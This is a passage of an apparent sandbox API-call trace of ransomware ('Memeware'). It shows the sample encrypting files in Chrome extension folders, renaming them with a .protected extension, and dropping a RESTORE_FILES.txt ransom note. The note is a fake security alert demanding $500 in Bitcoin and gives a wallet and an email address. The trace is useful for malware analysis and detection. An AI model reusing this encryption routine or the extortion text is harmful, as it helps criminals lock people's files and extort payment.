lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.089] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.089] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.090] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.090] CloseHandle (hObject=0x168) returned 1 [0080.090] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.protected") returned 165 [0080.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.protected")) returned 1 [0080.090] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.090] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.090] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0080.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.091] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.091] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.092] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.092] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.092] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.092] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.092] CloseHandle (hObject=0x164) returned 1 [0080.092] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.092] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0080.092] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0080.092] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0080.092] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0080.092] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0080.092] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it") returned 141 [0080.092] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0080.092] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0080.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*") returned 143 [0080.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.093] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.093] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.093] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.093] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\.") returned 143 [0080.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.093] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.093] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.093] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.093] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.093] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\..") returned 144 [0080.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0080.093] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.093] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.094] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0080.094] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.094] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0080.094] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.094] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0080.094] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.094] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0080.094] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.095] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0080.095] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.095] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.095] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.095] CloseHandle (hObject=0x168) returned 1 [0080.095] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.protected") returned 165 [0080.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.protected")) returned 1 [0080.096] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.096] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.096] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0080.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.097] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.097] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.098] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.098] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.098] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.098] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.098] CloseHandle (hObject=0x164) returned 1 [0080.098] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0080.098] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja") returned 141 [0080.098] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0080.098] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0080.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*") returned 143 [0080.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.098] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.098] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.098] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.098] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.098] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\.") returned 143 [0080.099] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.099] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.099] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.099] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.099] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.099] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.099] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.099] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\..") returned 144 [0080.099] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.099] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.099] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.099] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0080.099] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.099] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.099] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.099] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0080.100] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0080.100] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0080.100] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.100] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf5, lpOverlapped=0x0) returned 1 [0080.101] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.101] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf5, lpOverlapped=0x0) returned 1 [0080.101] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.101] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.101] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, 